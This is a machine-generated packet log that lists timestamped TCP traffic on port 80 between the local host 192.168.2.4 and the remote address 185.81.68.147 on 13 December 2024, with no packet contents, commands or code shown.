                                                              Dec 13, 2024 07:47:07.788173914 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.788223982 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.788973093 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.789006948 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.789056063 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.790335894 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.790371895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.790401936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.790407896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.790457010 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.790457010 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.790529013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.790843010 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.791399956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.791434050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.791462898 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.791482925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.792160034 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.792232037 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.792278051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.792279005 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.793297052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.793330908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.793345928 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.793395042 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.794373035 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.794397116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.794437885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.794437885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.794543028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.794682980 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.795367956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.795397997 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.795506954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.795598984 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.795650005 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.796461105 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.796489000 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.796535969 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.796536922 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.797466993 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.797482967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.797539949 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.798552990 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.798568964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.798608065 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.798692942 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.798962116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.799010038 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.799257994 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.800059080 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.800085068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.800296068 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.800667048 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.800682068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.800744057 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.800744057 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.801515102 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.801531076 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.801651955 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.802242994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.802258015 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.802366018 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.803375959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.803390026 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.803426981 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.803519964 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.803883076 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.803932905 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.804003954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.804080963 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.804781914 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.804799080 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.804833889 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.805996895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.806014061 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.806051016 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.806180000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.806478977 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.806503057 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.806575060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.807379961 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.807413101 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.807435036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.807451963 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.808162928 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.808187008 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.808213949 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.808271885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.809097052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.809113026 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.809156895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.810748100 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.810762882 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.810801029 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.810813904 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.810827971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.810852051 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.810883045 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.811554909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.811570883 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.811603069 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.811857939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.960119963 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.960159063 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.960176945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.960195065 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.960208893 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.960218906 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.960247993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.960269928 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.960843086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.961004019 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.962523937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.962538958 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.962554932 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.962569952 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.962584019 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.962624073 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.962642908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.962850094 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.963365078 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.963448048 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.964060068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.964238882 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.965137959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.965152979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.965168953 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.965183973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.965214014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.965214014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.965342999 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.966943979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.966959953 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.966974974 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.966991901 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.967036963 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.967036963 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.968328953 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.968344927 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.968403101 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.968403101 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.969386101 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.969399929 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.969415903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.969435930 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.969445944 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.969465971 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.969497919 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.971160889 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.971178055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.971194029 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.971209049 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.971234083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.971234083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.971245050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.971330881 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.972595930 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.972613096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.972644091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.972644091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.973680019 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.973695993 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.973711967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.973727942 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.973738909 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.973738909 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.973773003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.973773003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.974442959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.974466085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.974497080 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.974531889 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.975372076 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.975388050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.975433111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.975433111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.976630926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.976646900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.976689100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.977844954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.977916002 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.977927923 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.977945089 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.977960110 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.977973938 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.978004932 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.978004932 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.978744030 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.978760004 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.978810072 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.978979111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.979830980 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.979846954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.979897022 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.980310917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.980325937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.980364084 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.981136084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.981189966 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.981286049 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.981339931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.982047081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.982063055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.982098103 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.982110977 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.982966900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.982986927 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.983032942 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.983033895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.984318972 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.984334946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.984384060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.984384060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.984671116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.984687090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.984723091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.984765053 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.985371113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.985557079 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.985637903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.985691071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.986202955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.986251116 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.986327887 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.986386061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.987266064 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.987329960 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.987341881 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.987396955 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.988449097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.988466978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.988502026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.988574028 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.988818884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.988842010 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.988869905 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.988883972 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.989691019 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.989706039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.989747047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.989747047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.990444899 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.990492105 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.990582943 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.990638018 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.991360903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.991411924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.991422892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.991487026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.992130041 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.992182016 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.992223978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.992278099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.992989063 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.993040085 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.993422985 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.993472099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.993918896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.993935108 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.993966103 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.993976116 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.994764090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.994784117 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.994827032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.994827032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.995805979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.995821953 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.995868921 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.995868921 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.996383905 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.996438026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.996767998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.996820927 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.997494936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.997509956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.997556925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.997556925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.998168945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.998184919 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.998219967 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.998295069 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.998996973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.999022007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.999063015 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.999063015 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.999744892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.999794960 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.999876022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.999933958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.000689983 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.000734091 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.000745058 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.000807047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.001739979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.001754999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.001792908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.001858950 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.002351999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.002403021 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.002434969 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.002496004 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.003339052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.003427029 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.003503084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.003566980 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.003967047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.004031897 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.152239084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.152256966 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.152281046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.152345896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.152384043 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.152439117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.153239965 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.153264999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.153280973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.153310061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.153310061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.153397083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.154311895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.154328108 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.154360056 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.154398918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.155271053 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.155287027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.155339003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.155339003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.156004906 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.156028032 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.156068087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.156105995 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.156691074 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.156707048 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.156740904 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.157762051 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.157778978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:08.157824993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.157979012 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:08.158570051 CET8049738185.81.68.147192.168.2.4
